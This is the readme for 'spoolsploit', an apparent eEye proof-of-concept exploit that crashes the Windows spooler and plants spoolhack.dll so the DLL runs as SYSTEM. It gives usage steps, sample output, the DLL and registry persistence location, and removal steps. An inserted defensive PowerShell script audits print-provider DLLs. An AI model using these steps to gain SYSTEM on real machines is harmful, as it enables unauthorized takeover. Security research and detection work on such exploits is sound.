Whooo. Amazing that someone actually read the readme.txt heh.

---> Hack Me Up

1. Unzip spoolsploit.zip to a temp directory.
2. Copy whoami.exe to c:\temp
3. Type 'spoolsploit spoolhack.dll add' in the directory where you extracted the files.
You should see something like the following:
C:\hack\audit\exploits\local>spoolsploit spoolhack.dll add
Spoolss.exe exploit.
Marc@eEye.com
http://www.eEye.com
Waste: copy spoolhack.dll c:\winnt\system32
        1 file(s) copied.
Exploit Success.

At this point the spooler service should have crashed, so when someone tries to print on the system they will get an error and the administrator will have to restart the spooler service. When the spooler service is restarted, spoolhack.dll is loaded and executed. Since the spooler service runs as SYSTEM, the dll's code executes as SYSTEM, giving you full control of the local machine.

The current exploit dll just executes whoami.exe and pipes the output to c:\temp\eeyerulez.txt to show that we executed as SYSTEM.

Note: This example exploit will not work if your winnt directory is not c:\winnt. So if that is the case you will need to tweak the code to make it work.

---> Removing the hack dll

Delete c:\winnt\system32\spoolhack.dll
Delete the registry key: HKLM\SYSTEM\ControlSet001\Print\Providers\spoolhack.dll
Restart the spooler service and everything should be back to being peachy.
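For anyone auditing a box for this kind of print-provider persistence rather than planting it, here is an added check (not part of spoolsploit) that lists every registered print provider and flags DLLs that are missing, live outside System32, or are not validly signed. It assumes the standard provider key under CurrentControlSet; adjust the path if your system registers providers elsewhere.

```powershell
# Added audit script (not part of spoolsploit): enumerate registered print providers
# and flag any provider DLL that is missing, lives outside System32, or is unsigned.
# Assumes the standard provider key; adjust if providers live under another ControlSet.
$providersKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Providers'
$system32 = Join-Path $env:SystemRoot 'System32'

Get-ChildItem -Path $providersKey | ForEach-Object {
    $provider = $_.PSChildName
    # Each provider subkey carries a 'Name' value naming the DLL the spooler loads
    $dll = (Get-ItemProperty -Path $_.PSPath -Name 'Name' -ErrorAction SilentlyContinue).Name
    if (-not $dll) { return }

    # Relative names resolve against System32, which is where the spooler loads providers from
    $path = if ([System.IO.Path]::IsPathRooted($dll)) { $dll } else { Join-Path $system32 $dll }
    $flags = @()
    if (-not (Test-Path -Path $path)) {
        $flags += 'DLL missing'
    } else {
        if (-not $path.StartsWith($system32, [System.StringComparison]::OrdinalIgnoreCase)) {
            $flags += 'outside System32'
        }
        $sig = Get-AuthenticodeSignature -FilePath $path
        if ($sig.Status -ne 'Valid') { $flags += "signature $($sig.Status)" }
    }
    [PSCustomObject]@{ Provider = $provider; Dll = $dll; Path = $path; Flags = ($flags -join ', ') }
} | Format-Table -AutoSize
```

On a clean system the Flags column is empty for the built-in providers; an unfamiliar provider with an unsigned DLL is exactly what this readme's persistence step leaves behind.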

Signed,
Marc
Marc@eEye.com
eEye Digital Security Team
http://www.eEye.com